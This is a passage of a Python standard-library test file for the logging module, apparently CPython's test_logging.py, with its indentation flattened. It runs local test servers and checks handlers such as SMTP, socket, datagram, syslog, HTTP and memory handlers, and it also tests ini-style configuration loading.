:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
threading_helper.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
threading_helper.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
@threading_helper.requires_working_threading()
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
threading_helper.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
def closeFileHandler(h, fn):
h.close()
os.remove(fn)
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = warnings_helper.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
kwargs={{"encoding": "utf-8"}}
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, encoding="utf-8", **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
with self.check_no_resource_warning():
fn = make_temp_file(".log", "test_logging-X-")
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(closeFileHandler, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
encoding="utf-8",
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fn = make_temp_file(prefix='test_logging_', suffix='.sock')
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
def test_udp_reconnection(self):
logger = logging.getLogger("slh")
self.sl_hdlr.close()
self.handled.clear()
logger.error("sp\xe4m")
self.handled.wait(0.1)
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os_helper.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
@support.requires_working_socket()
@threading_helper.requires_working_threading()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = make_temp_file(".log", "test_logging-1-")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
